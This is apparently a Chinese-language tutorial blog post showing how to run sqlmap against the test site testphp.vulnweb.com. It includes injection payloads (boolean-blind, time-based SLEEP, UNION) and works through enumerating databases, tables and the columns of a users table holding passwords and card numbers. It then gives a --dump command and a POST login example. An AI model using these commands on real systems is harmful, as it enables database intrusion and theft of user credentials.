SQL 注入 SQLMAP 弱點測試

SQLMAP 是一個弱點掃描的工具，針對資料庫去作掃描

(小心測)

下載

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

開始掃 (–dbs Enumerate DBMS databases)，底下用一個測試網站來測試

python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs

[*] starting @ 18:25:09 /2019-08-14/

[18:25:10] [INFO] resuming back-end DBMS 'mysql' 
[18:25:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 7330=7330

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 4177 FROM (SELECT(SLEEP(5)))vSob)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7674 UNION ALL SELECT NULL,NULL,CONCAT(0x7171707871,0x7356667458666966494f6f7a7a4c77684a6876584761437444714c41784f4574455a6f6e6165724a,0x71716a7071)-- ggYH
---
[18:25:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.10, Nginx 1.4.1
back-end DBMS: MySQL >= 5.0.12
[18:25:10] [INFO] fetching database names
[18:25:10] [INFO] used SQL query returns 2 entries
[18:25:10] [INFO] resumed: 'information_schema'
[18:25:10] [INFO] resumed: 'acuart'
available databases [2]:                                                                                                                      
[*] acuart
[*] information_schema

[18:25:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] ending @ 18:25:10 /2019-08-14/

會找到可用的資訊，有用的資料庫名稱 acuart

[18:25:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.10, Nginx 1.4.1
back-end DBMS: MySQL >= 5.0.12
[18:25:10] [INFO] fetching database names
[18:25:10] [INFO] used SQL query returns 2 entries
[18:25:10] [INFO] resumed: 'information_schema'
[18:25:10] [INFO] resumed: 'acuart'
available databases [2]:                                                                                                                      
[*] acuart
[*] information_schema

接著針對找到的資料庫

python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables

會找到有那些 table

[18:27:21] [INFO] fetching tables for database: 'acuart'
[18:27:21] [INFO] used SQL query returns 8 entries
[18:27:22] [INFO] retrieved: 'artists'
[18:27:22] [INFO] retrieved: 'carts'
[18:27:22] [INFO] retrieved: 'categ'
[18:27:23] [INFO] retrieved: 'featured'
[18:27:23] [INFO] retrieved: 'guestbook'
[18:27:24] [INFO] retrieved: 'pictures'
[18:27:24] [INFO] retrieved: 'products'
[18:27:24] [INFO] retrieved: 'users'
Database: acuart                                                                                                                              
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

針對 users 這 table 再掃

python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --columns

什麼欄位都跑出來了

Database: acuart                                                                                                                              
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

開始去猜可能的帳號內容

python sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users --dump

也可 POST 資料

python sqlmap.py -u https://www.domain.TLD/user/login --data 'username=123&password=321'